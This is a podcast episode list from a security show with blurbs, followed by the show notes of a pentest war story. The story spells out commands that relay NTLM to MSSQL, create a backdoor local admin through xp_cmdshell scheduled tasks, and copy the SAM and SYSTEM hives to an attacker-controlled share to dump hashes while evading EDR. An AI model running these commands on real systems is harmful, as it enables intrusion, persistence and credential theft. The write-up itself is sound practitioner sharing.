7MS #720: Tales of Pentest Pwnage – Part 84
7 Minute Security
Hey friends! Today’s another Tales of Pentest Pwnage! Quick tangent first on a couple side projects: I’ve got a music thing at (like the duck noise, not the drug) and a podcast with my dancer son Atticus at . Speaking of Atticus — he just landed a spot in Master Ballet Academy’s summer program in Phoenix, and I am a very proud dance dad over here. OK, on to the pentest: A weird runas quirk: If your AD test account password ends in a percent sign, runas seems to misbehave (Claude thinks Windows is interpreting the % as a variable delimiter). Workaround:...
info_outline
7MS #719: Baby’s First OpenClaw
7 Minute Security
Hey friends! This week’s episode is “Baby’s First ” – basically me shouting into the void hoping a smart listener will DM me and explain why this thing is supposed to be life-changing. Because right now? I’m a little underwhelmed. Here’s the journey so far: The Mac mini quest: After seeing OpenClaw all over my feeds (people curing diseases! solving crimes!), I caved and impulse-bought a Mac mini. They were sold out everywhere, so I ended up paying twice what I wanted. Ick. Surprise MDM: First boot on the shiny new Mac, I found it auto-pre-enrolled in some other...
info_outline
7MS #718: Fun Professional and Personal AI Project Ideas
7 Minute Security
Hey friends! After last week’s heavy episode about my wife’s health scare in Punta Cana, today’s is a lighter one. (Quick update: she’s doing better – still recovering, but appetite’s back and she’s got some pep again. Thanks so much to everyone who sent kind messages.) Today I’m gushing about how AI has been making my IT and security life way more efficient: Firewall migration: Had AI walk me through a WatchGuard T15W → T25W migration (no clean config export path). AI captured everything – screenshots, branch office VPN, VLANs, firewall rules, DHCP reservations – all...
info_outline
7MS #717: I Gave Up My Wife’s PHI (And I’d Do It Again)
7 Minute Security
Hello friends! Today’s episode is a bit of a detour from our usual content — it’s part vacation horror story, part security/privacy confession. My wife got seriously ill during our spring break trip to Punta Cana, and in the chaos of navigating a foreign hospital at 2 a.m. with zero sleep and a pile of Spanish medical documents, I threw every privacy best practice I’ve ever preached straight into the ocean. Here’s what we cover: How a dream all-inclusive resort trip turned into an ambulance ride and a 3-day hospital stay faster than you can say “gastroenteritis” Why I uploaded...
info_outline
7MS #716: Tales of Pentest Pwnage – Part 83
7 Minute Security
Today is my favorite pentest pwnage tale of 2026 – and maybe ever! It centers around an ADCS abuse via an attack path I’d never seen before. Tips include: Use Netexec to pull Trying to steal reg hives and the EDR is made? Try copying them out to \\some-other-server.domain.com\share featured interesting use of the Responder -N option
info_outline
7MS #715: Tales of Pentest Pwnage – Part 82
7 Minute Security
Hola friends! Today’s another fun tale of pentest pwnage. This time we started with no credentials and then set off on the bumpy journey from no-cred zero to domain admin hero! One specific reference in today’s podcast that may be helpful to you is .
info_outline
7MS #714: Tales of Pentest Pwnage – Part 81
7 Minute Security
Hello friends! We’re back with a fun tale of internal network pentest pwnage. This one highlights how AI can be used (with some guardrails!) to automate the boring stuff – and even help you pick part DLLs to find gold nuggets! P.S. – I do recommend you check out our last three episodes that are all about securing your community, and please check out which will give you a full picture of what has been going on in Minnesota as it relates to the occupation of ICE agents.
info_outline
7MS #713: How to Secure Your Community – Part 3
7 Minute Security
Hello friends, in today’s edition of How to Secure Your Community, I give a brief recap of and , and then dive into some cool phone shortcuts you can setup so that with a single tap, you can alert friends/family that you’re having an encounter with law enforcement and may need an assist. Here’s the things/links discussed: This great which features interviews and first-hand stories of ICE encounters here in Minnesota Fashlight.org , which features some cool shortcuts you can setup on iPhone to alert friends/family that you’re having a negative...
info_outline
7MS #712: How to Secure Your Community - Part 2
7 Minute Security
Hello friends. Today’s episode piggybacks off of ‘s discussion of Operation Metro Surge and how it has affected the state of Minnesota. I also highly encourage you to read this which features interviews and first-hand stories of ICE encounters. And for those of you asking for a good org to support here in Minnesota, please support . They give rides/food to people who are detained by ICE and then cut loose – often without their jackets or phones – into the cold of winter with no ride home. Today I pivot more into the technical weeds...
info_outline
7MS #711: How to Secure Your Community
7 Minute Security
Hello friends, it’s good to be back with you. I took a podcast hiatus in January to focus on helping communities affected by . Today I share how my family and community has been affected by it. And then in future episodes of this series, I’ll get more into some technical nuts and bolts on how to be a more secure community helper – such as tightening up security settings on apps you use, “hardening” your phone, increasing your personal security/privacy posture, and more.
info_outlineHappy Friday! Today’s another hot pile of pentest pwnage. To make it easy on myself I’m going to share the whole narrative that I wrote up for someone else:
I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/.
I relayed the DA account to a SQL box that BloodHound said had a “session” from another DA. One part I can’t explain is the first relay got me a shell in the context of NT SERVICE\MSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITY\SYSTEM (!). The net command would let me add a new user, but BLOCK me trying to make that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks /create /tn "Maintenance" /tr "net local group administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f and then xp_cmdshell schtasks /run /tn "Maintenance".
Turns out a DA wasn’t interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP in to the victim and create a shadow copy. That part went fine, but for the life of me I couldn’t copy reg hives out of it – EDR was unhappy.
In the end, the bizarre combo of things that did the trick was:
- Setup smbserver.py with username/password auth on my attacking box:
smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!' - From the victim system, I did an mklink to the shadow copy:
mklink /d C:\tempbackup \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy123\ - From command prompt on the victim system, I authenticated to my rogue share:
net use \\ATTACKER_IP\share /user:toteslegit DontMindMeLOL! - Then I did a copy command for the first hive:
copy SYSTEM \\my.attackingip\sys.test. EDR would kill this cmd.exe box IMMEDIATELY. However….the copy completed! - I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!!
- Finishing move:
secretsdump -sam sam.test -system sys.test LOCAL